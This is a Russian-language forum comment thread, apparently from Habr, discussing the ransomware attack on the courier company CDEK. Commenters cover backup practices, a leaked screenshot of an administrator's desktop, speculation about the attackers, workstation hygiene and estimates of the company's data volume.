Этот же поток получает "рабочая" СУБД, которая применяет все запрошенные изменения, и записывает, какое последнее событие она видела. Эта СУБД бекапится по таймеру, например, раз в день.

В экстренной ситуации достается бекап СУБД, и достается часть потока, которая еще не была к ней применена.

Все это было придумано до нас. Называется бэкап лога транзакций. У любого мало-мальски уважающего себя DBA он настроен по расписанию. При такой активности, как у сдэка, это вероятно каждые 15-30 минут, иначе можно разориться на СХД.

Зависит от архитектуры всей системы. Такой подход вполне может использоваться на уровне приложения, если нужно одни и те же события синхронизировать в разные гетерогенные системы. Например, сайт, CRM и какая-нибудь аналитика, которая вообще что-то экзотическое и noSQL.

Но даже если нет и там реально одна база, куда идет весь трафик - все же имеет смысл при ответе описать механизм детально, хоть это и дословное описание логической репликации, которая и так есть в СУБД.

иначе можно разориться на СХД

Они же не видео в высоком разрешении хранят.

Причем тут видео? Лог будет бесконечно расти, если не бэкапить его. По-крайней мере в mssql, не знаю, как там в импорто-бла-бла-постгресах )) Можно, конечно, забить на все и резать лог, но в свете обсуждаемых новостей это будет вообще epic fail, не говоря о malpractices etc

Если создан снапшот базы, и мы уверены, что копия в безопасности - то лог на этом моменте можно обрезать смело.

Почему же? Можно и резать. Делаются горячие копии в обед и вечером, в к ним уже идут логи транзакций.

А ленточки - в сейф в спецотделе под роспись замшелого майора в отставке, который к нему никого, кроме лично директора - не подпустит.

А тестировать, что эти бэкапы в принципе можно обратно развернуть, уже не надо?

При необходимости, срок хранения на ПВЗ будет продлён

но заплатить вам за дополнительное хранение придётся

да это я думаю уж отменят, с барского плеча. Другое дело что части клиентов уже и не актуальна будет эта посылка если так дальше пойдет. В комментах под другой статьей уже писал что оказывается часть визовых центров СДЭК как доставку используют. Так и без паспорта к отпуску можно остаться, например.

Меня очень впечатлил скрин рабочего стола их админа, он очень хорошо все объясняет. Если эти скрины настоящие, конечно.

А что там на скрине?

К сожалению, не все имеет Х

Прикрепите, пожалуйста, здесь тоже

Спасибо!

Да, занятно )))

А где папка "все логины и пароли"? Неужели с рабочего стола в мои документы перенесли?

Верхний ряд, третья иконка справа :(

Твою-ж... вот это просто жесть...

Божечки мои

В верхнем ряду файл "Контакты пароли", справа от бэкапов

Да, спасибо, не увидел сразу т.к. искал папку)

зашифрована )))))

Вот здесь

А папки "Яой", "Футанари", "MLP фурри" у него стыдливо в папку "Видео" убраны, чтобы безопасники не нашли?

Не, это в %windir%/system32 где-то

господи, какой кошмар.

Надо не только делать бэкапы, но и уметь их потом разворачивать (тренировки должны быть)

А каким образом вирус попал к ним в сеть? Какой-то манагер открыл вложение из письма с темой "поздравляем, вы выиграли дохренилиард"?

Какой-то манагер открыл вложение из письма с темой "поздравляем, вы выиграли дохренилиард"?

Ну им я бы слал письма с темой "Где моя посылка!? или "Претензия повреждение груза"/Срыв сроков доставки %оченьважнойхрени%".

судя по скрину из треда выше (если он настоящий), там в целом не было никакой защиты. У админа uTorrent, DownloadMaster, TorBrowser и Putty на одной рабочей машине. Ещё и игры установлены.

Подозреваю, что его сделают крайним. И фактически это так, но кроме него остальные тоже не работали, раз ползволяли такое и не детектили.

Он там что, один единственный работает админом? ) Но в целом конечно - показательно
Да и что криминального в путти ?

Да и что криминального в путти ?

Криминал в том, что вся та нечисть, которую он накачал себе на комп, может потом лезть туда же, куда он лезет с putty.

а, в этом плане .. ну, да.
но вообще, декстоп конечно адочек. полный адочек. там и без путти все плохо)

А игры чем провинились?

действительно, почему бы не поиграть на рабочем месте с рабочей машины. Игры ж честно спирачены с помощью торрентов.
А нет, он торрентами заливал бэкапы ... ну серьезно?

Не, ну все же вывод о том, что игры всенепременно спирачены с торрентов просто из-за наличия игр и торрентов на компьютере он весьма натянутый.

в любом случае этому всему не место на машине, имеющей доступ к критически важной инфраструктуре. Корпорации обжигались на этом, и последние лет 5 я вижу, что абсолютно все пришли к идее, что личная машина и рабочая - это две разные машины. У меня на машине админки установили jamf, и это практически анальный зонд, который не даёт мне ставить что угодно, следит за пулом активных процессов, а также за сетевой активностью. И я не против такого зондирования, пока оно не палит мой монитор и переписки.

Рабочая машина должна быть стерильна как операционная комната, иначе получится CDEK. Или в операционной хирургу тоже можно уже помытыми руками на своей мобилке 10 минут поиграть, пока пациент засыпает? не, нуачотакова?

в любом случае этому всему не место на машине

Нас напряг именно вывод "игры+торренты = обязательно пиратка". В том что на компьютере недопустимый бардак - это и так понятно, чего один файл с клиентами и паролями стоит:)

Если у вас уровень доступа 100500 к данным и бэкапам, то ещё окей.

Остальным предлагаете таскать по два ноута с собой, если надо вечером после работы зайти в личный телеграмм или посмотреть фильм?

Остальным предлагаете таскать по два ноута с собой

ну либо так, либо

вечером после работы

после работы - не работать.


Если вы дежурный админ - то это вариация работы. Если вы не дежурный - то слать с проблемами к дежурному. Если вы дежурите 24/7, то тут вопросы к организации процессов.

p.s.: ношу в отпуске 2 ноута последние 5 лет, потому что мне так по кайфу. Мышцы спины всегда в тонусе, зарплата тоже, чувствую себя прекрасно.

upd: потерял исходный тезис, считаю, что его тоже стоит откомментить: если вы не имеете официального доступа к 100500 данным и бекапам, то вы всё равно имеете доступ к корпоративной сети. Вы - её часть. Потому не надо эту часть заражать, носите 2 ноута.

Рад за вас, что вам не в тягость таскать с собой лишние 3-5 килограмм, только это выглядит как излишний фанатизм, если можно просто использовать разные системы / разных пользователей и не качать файлы `чит_коды.exe`, этого достаточно.

Или вы при `apt install` или `brew install` тоже всегда идете и проверяете, что пакет без мэлварей?

Ну и напоследок - если у вас такие доступы, что вы можете положить весь условный сдэк и похерачить бэкапы, то ваш ноутбук вообще не должен покидать офиса компании.

Ну у нас считают что ключ в токене + РДП достаточная защита для задач с повышенными привилегиями. За самим ноутом не следят

уже написали в комментарии выше - машина с такими высокими доступами должна быть чиста и анально зондированна, чтобы даже мышь не проскочила.
Хочется играться - велком, тащи свой ноутбук, со своим хотспотом и хоть заиграйся

Именно такие случаи и должны были предвидеть ИБшники.

Я не уверен, что там ИБшники вообще заглядывали - если рабочий стол админа выглядит как на скриншоте ...

@rondomize Ушел прибираться на рабочем столе, чтобы было не стыдно...

Удивлен, что много злорадства по этому поводу в сети, даже может быть больше чем с противоположной стороны, ведь всем понятно, с какой страны Сдек поломали. Коллективно помочь им никак нельзя?

И как вы хотите им помочь коллективно?

И как вы хотите им помочь коллективно?

Лучи добра послать или журавликов бумажных сложить, поддержать морально

Думаю, если даже такой коллектив соберется, в последнюю очередь он будет распространять такие данные публично. Неизвестно, какие доступы там ещё остались. Сам никого не собираю, если что.

/ведь всем понятно, с какой страны Сдек поломали.

Мне непонятно. Можно объяснить для тупых. Желательно с доказательствами, а не многозначительными ухмылками и "ну вы же понимаете"... Теории рептилоидов, плоской земли и многозначительных ухмылочек - оставим для РенТВ.

Основатель и владелец СДЭК нашел покупателя на свою долю в компании https://www.vedomosti.ru/business/articles/2024/04/26/1034281-osnovatel-sdek-nashel-pokupatelya-na-svoyu-dolyu

А давайте поиграем в теории заговора?

Основатель и владелец в Израиле, покупатель - из России и решил "уронить" стоимость компании, чтобы купить подешевле и нанял хакеров/подкупил сотрудника СДЭКа и Украина тут вообще не при делах, разве что за уши можно притянуть истории 2022 года.

Возможно, что в мирное время можно было сломать транспортную сеть и быть не при делах. По сути это похуже чем пару поездов пустить под откос.

Ну так ищите кому выгодно - выгоды Украине от того, что кучка посылок не поедет по стране - практически нулевая, или МО РФ пользуется СДЭКом для транспортировки вооружения и топлива?

Вы серьезно? А маскировочные сети, бронежилеты, запчасти и тд от негосударственных организаций и фондов перевозят на военных самолетах?

PS в пункты сбора имеется ввиду. Вообще там много всего застряло, в том числе лекарства.

А почему в обеспечении армии участвуют какие-то фонды и негосударственные организации? Тем более в таких базовых вещах как лекарства и бронежилеты

Использует\использовала точно, например, для отправки в организации по их ремонту. Та самая известная фотография с камеры наблюдения из пункта СДЭКа 2022 года как раз это показала.

Это были физлица или ВС РФ?

В этом выгода и есть. Нагадить по диагонали всей экономике. Только никто такими масштабами не мыслит в руководствах, включая ваш комментарий. И исходя из такой интерпретации можно сказать, что это не точечный заказ "сверху".

Они намародёренное отправляют.

Н - наивность. Вы предполагаете некто из России в целях личной выгоды связался с хакерами, которые до этого:

...взломали провайдера, который обслуживает военные части на Кубани...
...слили в сеть техническую документацию концерна "Калашников...
...украли документы из базы данных российской НПО «Высокоточные системы и технологии» - между прочим по проекту гиперзвуковой ракеты...
Cписок можно продолжать, угадываете его направленность? Это всё Head Mare и доказательства можно найти в их публичных аккаунтах в соцсетях.
Вы все еще думаете, что это обычные хакеры вне политики. Ну-ну.

П - притянули за уши - военные конторы и контору по пересылке посылок.

Вы на моё сообщение ответили? Про Сдек там ни слова нет. А про то есть, что эти хакеры проукраинские. Возможно, вы считаете, что они каким то образом берут отпуск от своих политических убеждений, когда ломают транспортную компанию, но так не бывает.

Сдек это не только про посылочки и бандерольки. Повторюсь, Сдек это транспортная компания, часть российской логистической  инфраструктуры.

Вообще, это не говорит о том, что в сдеке совсем уж плохо с безопасностью, ведь их взломала известная международная хакерская группировка.

А у тех, кто с дивана радуется, мол "так им и надо", скорее всего на ноуте крутятся всякие там майнеры левые и прочее, может быть даже и боты тех же хакеров...

известная? я впервые сегодня о них услышал(

Вы внимательно читать не хотите, приплетаете какие-то военные конторы зачем-то, я говорил только про СДЭК и что его хотят продать. Во взломанных военных конторах могут быть совсем другие причины взлома.

связался с хакерами, которые до этого:

Неплохой послужной список, если не наврали в резюме.

Вы все еще думаете, что это обычные хакеры вне политики

Вы утверждаете, что они исключительно идейные, а не просто «наёмники»? А основания для таких утверждений есть?

Факты направленного умысла привел выше, по поводу ваших предположений потрудитесь привести доказательства самостоятельно. За взлом они выкуп не просили и до этого об этом не было и речи. Наемники без принципов взяли бы и с тех и тех деньги. Жду факты, раз вы утверждаете, что они наемники.

Как ты им поможешь? Уволить админов и нанять профисионалов?


p.s. Тут больше вопросов, почему вся инфраструктура имела 1 выход, небыло распределение прав, бекапов и т.д. Вопросов больше чем ответов.

В данный момент им скорее капитаны очевидности не нужны, а вот проверенные безопасники с опытом готовые подписать nda и помочь чем можно, будут полезнее.

Если скриншот верен - то им нужен толковый CTO, а так же вменяемые собственники, которые не будут экономить на всем. Но с другой стороны, тогда может сломаться бизнес-модель.. У той же ПР - своя отдельная от интернет сетевая инфраструктура, но там такие расходы на аренду у Ростелекома..

"Отдельная от интернета сетевая инфраструктура" - это тот же VPN, только приватность обеспечивается не криптографией, а честным словом провайдера. Для безопасной работы нет никакой необходимости заказывать что-то подобное у Ростелекома.

Нет. Представьте, что вам в IP адрес, висящий на спутниковом терминале, прилетает DDoS. И что с ним делать будете?

Ростелеком дает MPLS VPN, который никак в сторону интернет не смотрит. И даже в случае каких-то ваших косяков ничего всему миру открыто не будет.

И даже в случае каких-то ваших косяков ничего всему миру открыто не будет.

Зато может в случае косяков Ростелекома (не всему миру, конечно, а тем кто проэксплоитировал конкретную дыру на железе РТ, но в любом случае, такая изоляция панацеей не является)

а тем кто проэксплоитировал конкретную дыру на железе РТ

А как ее проэксплуатировать, если такие дыры в 99% случаев можно использовать, только имея доступ на management interface, который снаружи не доступен?

Нет. Представьте, что вам в IP адрес, висящий на спутниковом терминале, прилетает DDoS. И что с ним делать будете?

То же самое, что и если кто-нибудь обрежет провод с тем самым MPLS VPN.

Провод легко восстановить, а так же поймать злодея. А DDoS остановить - та еще проблема.

Если бы они были нужны, у них уже был бы штат.

Можно публично призвать самые лучшие ИТ-кадры устроиться к ним на работу и порешать их внутренние проблемы.

И что эти кадры сделают, расшифруют базы без ключа дешифровки?

Абстрагируясь от политики и теорий заговора, мне злорадство тоже непонятно. У огромного количества людей встали отправления - а ведь там не только условные шмотки, но и, например, документы, лекарства и т.п. Да даже и шмотки - что в этом зазорного? Еще кто-то использовал СДЭК для переезда, например, они же полноценная ТК, а не просто аналог почты. А ведь еще проблемы получили и многие интернет-магазины, которые интегрировали доставку со СДЭКом, так как он часто наиболее дешев и зачастую шире распространен в регионах, чем другие ТК. Так что этого улюлюканья я не понимаю.

"If it's Boeing, I ain't going"

Посмотрите историю Боинга за последние годы и что значит фраза выше.

Вот то же самое со СДЭКом. Менеджмент экономил, резал косты... И дорезался. Многомиллионные премии себе и золотые парашюты разумеется резать никто не желал.

Но виноват в урезании костов не менеджмент, нет. Кто же виноват? Дефективные некомпетентные топ-менеджеры с миллионными зарплатами?

Нет.

Оказывается во всем виноваты улюлюкающие анонимы с хабра.

И вот пока за управленческие решения - не будут нести ответственности управленцы, такое будет сплошь и рядом. Порезал косты? Ответственность на дефективном эффективном менеджере. Не на сетевых админах, которые могли быть компетентней - но их не смогли нанять, т.к ФОТ порезал менеджер. Не на админах резервного копирования - они были бы и рады настроить резервное копирование, но деньги на достаточное количество СХД и прочей оборудки - порезал менеджер. Сами не имели необходимых знаний? Нанять эксперта, хотя бы на аудит и проект по приведению в порядок? - денег нет.

Поэтому виноват там ТОЛЬКО менеджмент.

Оказывается во всем виноваты улюлюкающие анонимы с хабра.

Вас ведь не затруднит продемонстрировать, где в моем комментарии это написано?

Поэтому виноват там ТОЛЬКО менеджмент.

Вас ведь не затруднит продемонстрировать, где в моем комментарии это отрицается?

Вообще, у меня ощущение, что вы промахнулись веткой или как-то очень по особому читали мной написанное. Еще раз: я вообще ни о чьей вине не говорю (ежу понятно, что виноват менеджмент, как понятно и то, что в итоге крайним будет админ с интересным рабочим столом). Я лишь предлагаю, прежде чем злорадствовать, рассматривать ситуацию не в парадигме отношений "менеджмент-айтишники", а взглянуть на это с точки зрения клиентов СДЭК, которые в этой ситуации-то уж точно не виноваты, и которые в итоге страдают больше всех (и тут даже не пройдет "а вот нефиг ими пользоваться" - поскольку, во-первых, такое утверждение само по себе глупо, а, во-вторых, много где выбирать приходится только между СДЭК и Почтой). Менеджмент тут никак не пострадал, разве что стрелочники среднего звена.

А последствия для клиентов крайне негативные, не удивлюсь, если под шумок некоторые отправления "внезапно пропадут". Кстати, интересный факт: у меня на Озоне перенесли срок доставки аж на неделю у нескольких заказов, которые должны были прийти сегодня-завтра и везлись их логистической службой (не СДЭК). Конечно, "после - не значит вследствие", но такое происходит в первый раз на моей памяти.

Ну вот лично у меня из-за их отношения к ИБ баз слиты все адреса, телефоны и паспортные данные. Так что мне злорадство вполне понятно.

Самое плохое во всей этой истории в том - что нет никакой обратной связи. Да скажите уже что нас взломали, у нас проблемы и мы их пытаемся решить. А не прикидываться валенком, это не пройдет само. Как малые дети ...

В прошлой новости в комментариях писали, что нельзя

Это прям какой-то сюр ... я даже не знаю что сказать.

резервные копии раз в полгода

Как я понял, эта информация тиражируется из твитора из сообщения на скрине и в подтверждение этих слов приложен скриншот с датами из Veeam. Но ведь на скриншоте даты создания репозиториев Veeam, а не даты создания бекапов. Поправьте, если ошибаюсь.

Тут либо не разобрались что где что в Veeam и приложили скрин, либо намеренно выдали такую инфу, что бы выставить ит сдека более некомпетентными.

Твитор

Скрин Veeam

Верно, это даты создания репозитория, а не его обновления. Плохо только то, что этот скрин есть вообще - это может означать вариант того, что эти бэкапы были доступны для хакеров и возможно, бэкапов уж нет =\

head mare ровно это в своём твиттере и утверждают: что бекапы тоже пошифрованы

собственно поэтому утверждение про "бэкапы раз в полгода" бессмысленно. Дать хоть даже каждый день были бы бэкапы, их пошифровали или поудаляли. =\

Потому что надо чтобы бекап сервер подключался к боевому, делал бекапы к себе, а потом отключался, и все это время он жил в режиме рид-онли для остального мира.

А делать бекап той-же машиной которая может быть скомпрометирована - ссзб.

Причём бэкап сервер должен подключаться со строго ограниченными правами на запись в определённое место на сервере.

Писать надо просто на ленту (желательно worm кассеты) и никто не пошифрует бэкапы. Причем библиотеки ленточные сейчас позоляют принимать сразу данные потоком. Сюда же на ленту класть отдельно копии систем для развертывания быстрого.

Ну или на съемные диски. Да масса вариантов, лишь бы делали

очень хочется, чтобы вон те 2 недоступных репозитория оказались оффсайт DR и какеры туда не добрались
очень хочется, чтобы вон те 2 недоступных репозитория оказались оффсайт DR и какеры туда не добрались

звучит как правда

Информация бывает двух видов: сохраненная в оффлайне и потерянная

100% !

Извините...

"я бы создал отдельный сервак в независимой инфраструктуре (куда админы доступ не имеют)"

Нет никакого смысла городить свои велосипеды, если уже давно придуманы стандарты безопасности, например, PCI DSS для банков, SOX для компаний, размещающих свои акции на бирже и т.д.

Всё, что нужно - это перестать менеджерам экономить на ЗП для админов, внедрить условный PCI DSS, каждые полгода проходить его проверки и построить нормальные бизнес-процессы. Это не гарантирует 100% отсутствия взлома, но заметно его усложнит и уменьшит масштаб ущерба.

Ну создать свой или уже есть готовое, я просто хотел описать примерное решение как можно, если есть решение, то почему не взять его.

Тут все легко и просто - работали по сути новички. Не так давно мониторила вакансии и попадались и транспортные компании и туроператоры и авиаперевозчики. Везде ЗП на уровне новичков. Что еще от них можно ждать.

А Бизон - ну тут нужно понять момент - они только писали рекомендации или СДЭК прошел их проверку.

Надеюсь это послужит уроком для остальных компаний.

Бизон.. нужно понять момент

писали рекомендации

прошел их проверку

Лол. Бумажная безопасность как есть.

Тут все легко и просто - работали по сути новички.

Старость, опыт и зарплата тоже ровным счетом ничего не гарантирует. Какой стимул у работника, который в случае взлома его сервиса отвечает максимум в размере штрафа в ползарплаты, делать свою работу качественно? Никакой вообще. Ну, кроме самосознания и гордости за проделанную работу, но это немного не те факторы, на которые можно полагаться в бизнесе. А другой ответственности на сотрудника в штате не повесишь в принципе, по ТК. Аутсорс безопасности дает возможность включить какие-то штрафы за некачественный софт возложив его на независимого исполнителя, но тут уже другие риски, риски утечки. Поэтому по большому счету золотой пули нет.

Можно ли всё восстановить из свежих сливов?

Не зря у админа на рабочем столе uTorrent есть. Как раз для отката на распределенный бэкап, я полагаю.

Я как чувствовал, когда при получении посылки отказался от очередного предложения оформит сдэк id))

Хотя мои ПД уже давно слиты благодаря другим конторам...

Это эпидемия только для windows машин.

А причем тут ОС вообще?

Как-то странно на хабре зачем-то начали пролетать "бодрые" статьи на тему успешно отбитых атак на системы, уменьшении утечки персональных данных и т.д.

А как оказалось, важно не сколько смогли предотвратить, а сколько достигло цели

Но возможно это чисто совпадение или искаженное восприятие реальное

Как минимум, разбор данного случая, лично мне, был бы интереснее, чем истории успеха

вот интересно - у них же там базы плюбому терабайтных размеров - и как такие бекапить?

NetBackup/Commvault/etc в lan-free на лент. библиотеку в десяток драйвов ;) Хотя вон тот же Veeam 1.6TB БД по 10g в 4-потока бекапит за 18 минут.

Терабайты могут быть суммарно. Просто прикиньте, сколько надо, чтобы описать прием, транспортировку и выдачу одной посылки - килобайт 10 с избытком. Сколько посылок в работе в каждый момент времени?

В 2022 году СДЭК доставил 85 млн отправлений. Пусть к 2024 году объем вырос на 30%, хотя врядли. Итого ежедневно принимается (85 000 000*1.3/365) - 300 тысяч посылок в день. Средний срок доставки посылок явно не больше 10 дней. Итого в работе находится 3 миллиона посылок. И объем данных, которые надо хранить как зеницу ока - не больше 30 гигабайт.

Поток данных для сохранения в реальном времени - 34 килобайта в секунду (300000 посылок в день * 10 килобайт на посылку / 86400 секунд). Скорость 3.5" дисковода для гибких дисков, если что.

Остальные данные носят исторический характер и несомненно нужны, но их утрата не будет такой критичной. Их, соответственно, около 85 000 000 штук в год * 24 года работы / 2 (усредняем, они же росли постепенно) * 10 килобайт на посылку = 10,2 терабайта (1/4 картриджа LTO-9).

Да, это только критичные данные, без которых бизнес встанет (встал). Есть еще куча служебной переписки, фото, видеозаписи и т.д., но это уже данные, не требующие резервирования в реальном времени, их можно не спеша по ночам скидывать на ленточки и складировать в темном сухом месте.

Поток данных для сохранения в реальном времени - 34 килобайта в секунду (300000 посылок в день * 10 килобайт на посылку / 86400 секунд). Скорость 3.5" дисковода для гибких дисков, если что.

Нужно не забыть еще умножить ещё на количество возможных комбинаций статусов (от "принято" до "вручено" со всеми транзитными узлами), иначе есть риск очень долго потом искать где что завалялось.

Прикинул, что 10 килобайт - это максимальный объем данных, порождаемых одной посылкой. Для описания статуса необходима буквально пара десятков байт (ИД посылки, ИД узла и сотрудника на узле, время и код статуса). И вообще, постарался оценить по верхней границе. :)

На самом деле даже эти данные не являются критическими и вообще важными. Только это утраченные технологии предков.

Критическими являются данные о назначении и оплате. Т.к. ихние посылки на сколько я помню с 16 сторон обклеены персональными данными получателя, то тоже самое можно продублировать в куаркоде включая нужные айдишники.

Наличие посылки в базе ни на что не влияет. Где бы её ни взял сотрудник ТК, сразу понятно что с ней делать дальше. Будь то это сортировака, хоть выдача. Пропикал сканером и готово - посылка добавилась (или встала в очередь) в базу (с тем же айдишником) и её перемещение стартует с этого места.

Где она была до этого - ни на что не влияет. История перемещений загрузится завтра чере кафку когда не сойдется вечерняя сверка. Даже можно json'ы через syncthyng ели у вас прям совсем труба с бюджетом IT.

Реально нужен справочник пунктов выдачи. Ну и прайс. Но его можно раз в сутки на сидиром записывать и ставить в привод без функции записи (мы так невзламываемый сайт делали четверть века назад). Плюс он очевидно должен локально кэшироваться в пунктах выдачи. По этому пункты выдачи легко могут отработать пару дней вообще автономно.

Да, отвалятся всякие примочки вроде вызова курьера с сайта, но это проблема другого масштаба, и то не надолго.

Тогда придется все нужные для идентификации персональные данные получателя (и отправителя - для возможного возврата) прямо на посылке размещать. Оно, конечно, не очень страшно, но немного напрягает.

Ну и при потере истории отвалится работа с корпоративными клиентами - доставить-то посылки доставят, а как узнать - оплачено все, или не оплачено, и сколько задолженность на текущий момент.

А так можно, конечно ;)

ФИО, телефон и адрес на посылке и так написаны. По большому счету этого достаточно. Дублирование в куаркоде нужно только для упрощения машинного считывания.

Для бухгалтерии тоже есть решения.

Для аварийного режима на сутки на время восстановления это всяко лучше чем полный локдаун на 3 дня.

ФИО, телефон и адрес на посылке и так написаны.

Не везде так. У DPD на коробке только им указано. Остальное через штрихкод, из базы данных. Несколько лет назад на коробке еще телефон указывали, потом перестали.

по моей практике работы в курьерской доставке приблизительно 2-3% отправлений имеют ошибки и расхождения физических данных на коробке и системных. В большей части случаев (приблизительно 60-70%) это человеческий фактор (изменили данные в системе, забыли физически переклеить, наклеили что-то не туда, какую-то старую информацию не зачеркнули и пр.), а частично это системные (внесены изменения в системные данные без оповещения работников "на земле", ввиду чего они даже не знают, что должны данные поменять, ошибки в ШК, нечитаемые данные из-за плохой печати - например, на предыдущей работе у турецкого поставщика все QR-кода не читались из-за раздолбанного офсета, на котором печаталась упаковка и т.д.) Плюс риски пересортов при невнимательном чтении с физики, но этот фактор есть всегда, его не берем. Ориентироваться на физические маркировки как безошибочные - это серьезные риски. Я как-то свой первый в жизни штраф на работе получил именно за то, что проигнорил системные данные, где было написано "Москва" и перекинул посылку в Тюмень, потому что на ней было написано "Тюмень", оказывается, это у отправителя не влезло в поле на этикетке "Tyumen Oil Company". Обычно при сопоставлении с системными данными так или иначе эти ошибки выявляются в процессе обработки, и в конечном итоге остается около 0,1-максимум 02%, которые доходят до клиента из-за ошибок в физической маркировке. Если взять за чистую монету написанное на коробке, то ошибок будет огромное количество, и их выявление и обработка сожрет гигантские людские ресурсы.

приблизительно 2-3% отправлений имеют ошибки и расхождения физических данных на коробке и системных.

Я так понимаю, вы до последнего абзаца не дочитали? Вроде я не так много текста написал.

Сравните две ситуации при недоступной центральной БД.

  1. доставлено 0% посылок

  2. доставлено в срок 97% посылок, 3% доставлено с большой задержкой.

Является ли разница существенной?

Потом обновить данные посылки по маршруту можно и без центральной БД.

@LinkToOS

Не везде так.

Достаточно что где-то так. Я сам по привычке испытываю дискомфорт когда выбрасываю в помойку именные упаковки. Но это преимущественно российская специфика и проблема не в упаковках.

Сравните две ситуации при недоступной центральной БД.

  1. доставлено 0% посылок

  2. доставлено в срок 97%